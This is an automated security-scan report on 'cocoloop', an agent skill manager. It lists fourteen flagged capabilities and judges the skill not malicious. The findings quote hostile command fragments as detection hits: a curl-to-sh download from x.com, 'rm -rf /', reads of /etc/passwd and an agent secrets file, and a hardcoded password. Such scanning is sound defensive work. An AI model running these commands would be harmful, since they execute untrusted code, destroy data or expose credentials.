ClawAudit verdict
cocoloop
Accesses credentials AND makes external network calls
Skill manager that wraps a CLI for searching and installing skills from official sources; network_out and credential_access are expected for an API client, and executionSinkDetected reflects documented CLI invocation patterns with no evidence of malicious behavior.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
What it does
These are capability combinations: each listed behavior occurs in the skill, but ClawAudit detects co-occurrence — it does not verify that one flows into another. Read the code to confirm a live chain.
Accesses credentials AND makes external network calls — potential credential theft
LLM02 · ASI03
Permission integrity
network_out
credential_access
Findings (14)
Uses eval() — can execute arbitrary code
references/cocoloop-safe-check.md · code · eval(
Recursive delete from root or home — destructive command
references/cocoloop-safe-check.md · prose · downgraded · rm -rf /
Dynamic import() — loads module at runtime
references/cocoloop-safe-check.md · code · import('
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
references/safety-check-guide.md · prose · downgraded · curl http://x.com/s.sh \| sh
Pipe to sh — executes piped content as shell commands
references/safety-check-guide.md · prose · downgraded · | sh
Possible hardcoded credential
references/safety-check-guide.md · prose · downgraded · password = "secret123
Accesses sensitive system files
references/safety-check-guide.md · prose · downgraded · /etc/passwd
Accesses OpenClaw config/secrets directly
SKILL.md · prose · downgraded · ~/.openclaw/openclaw.json
Uses exec() — may execute shell commands
references/cocoloop-safe-check.md · prose · downgraded · exec(
References child_process — can spawn system processes
references/safety-check-guide.md · prose · downgraded · child_process
Uses spawn() — can execute external programs
references/safety-check-guide.md · prose · downgraded · spawn(
Makes HTTP request to external URL
references/cocoloop-safe-check.md · code · fetch('https://
References agent configuration files
references/install-guide.md · prose · downgraded · CLAUDE.md
Popular HTTP library — network access
references/safety-check-guide.md · prose · downgraded · axios
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
network_outcredential_access Thanks — recorded.